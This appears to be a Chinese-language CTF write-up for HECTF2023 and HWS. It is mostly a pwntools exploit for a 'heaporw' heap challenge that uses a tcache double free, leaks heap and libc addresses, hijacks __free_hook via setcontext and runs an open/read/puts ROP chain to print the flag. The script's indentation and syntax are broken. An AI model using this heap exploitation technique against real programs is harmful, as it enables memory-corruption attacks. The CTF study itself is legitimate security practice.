HECTF2023 and HWS

HECTF AND HWS

magicode

alloc()函数多分配0x10

风水大狮

heaporw

爆破glibc基址,然后可以利用**__free_hook进行orw**

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
from pwn import *
 context(os='linux',log_level = 'debug',arch='amd64')
 libc = ELF("./libc-2.26.so")
 elf = ELF("./pwn")
 debug=1
    if debug=1:
        io = process('./pwn')
    else:
     io = remote('0.0.0.0',10003)
 ret = 0x937
 pop_rdi = 0x20b8b
 pop_rsi = 0x20a0b
 pop_rdx = 0x01b96    
     def debug():
         gdb.attach(io)
         pause()
 
     def add(size, context=b'AAA', line=True):
         io.recvuntil(b'option:')
         io.sendline(b'1')
         io.recvuntil(b'size:')
         io.sendline(b'%d'%size)
         io.recvuntil(b'context:')
         if line:
             io.sendline(context)
         else:
             io.send(context)
             sleep(0.5)
 
     def delete(idx):
         io.recvuntil(b'option:')
         io.sendline(b'2')
         io.recvuntil(b'index:')
         io.sendline(b'%d'%idx)

     def show(idx):
         io.recvuntil(b'option:')
         io.sendline(b'3')
         io.recvuntil(b'index:')
         io.sendline(b'%d'%idx)
         return io.recvuntil(b'\x00+----',drop=True)
 
 
     add(0x58,b"AAAA")
     delete(0)
     delete(0)
     delete(0)
     add(0x58,b"\x00",line=False)
     heap = u64(show(0)[:8])+0xf000
     flag_str = heap+0x2a0
     flag_addr = heap+0x3f0
     rop_addr = heap+0x310
     delete(0)
     print(hex(heap))
     add(0x58,p64(heap+0x2a0))
     add(0x58,b"")
     add(0x58,b"./flag\x00")
     res =u64(show(2)[0x20:0x28]) + (0x7fb0ac795000-0x7fb0ac794d60) + 0x10
     print(hex(res))
     if res < 0x7f0000000000:
         io.close()
         return True
 
     delete(0)
     delete(1)
     delete(1)
     print()
     add(0x58,p64(res))
     add(0x58,b'')
     add(0x58,b'\x00',line=False)
     libc_base = u64(show(3)[0x10:0x18]) - (0x7fc784a21570 - 0x7fc784a00000)
     libc.address = libc_base
     # (0x7f28d9c3c1a0 - 0x7f28d9c00000)
     delete(1)
     delete(0)
     delete(0)
     payload = b'\x00'*0x18 + p64(flag_str) + p64(0) + b'\x00'*0x28 + p64(rop_addr) + p64(ret+libc_base)
     add(0x48,b'')
     add(0x6f,payload)
     delete(1)
     delete(0)
     add(0x58,p64(libc.sym["__free_hook"]))
 
     rop = b''
     rop += p64(libc.sym['open']) # open期间会mov rdx,0
     rop += p64(pop_rdx+libc_base) + p64(0x30)
     rop += p64(pop_rdi+libc_base) + p64(3) + p64(pop_rsi+libc_base) + p64(flag_addr) + p64(libc.sym['read'])
     # rop += p64(pop_rdi) + p64(1) + p64(libc.sym['write']) # 调用write过程中会访问[rip+offset] 可能出现越界或无r权限
     rop += p64(pop_rdi+libc_base) + p64(flag_addr) + p64(libc.sym['puts'])[:-1]
     add(0x58,rop,line=False)
     # add(0x58,b"123123")
     add(0x58,p64(libc_base+0x4a865)) # setcontext+offset
     add(0x48,b'\x00',line=False)
     # debug()
     delete(5)
     # pause()
 
     io.recv()
 # 0x290
io.interactive()

Bit

明天复。。。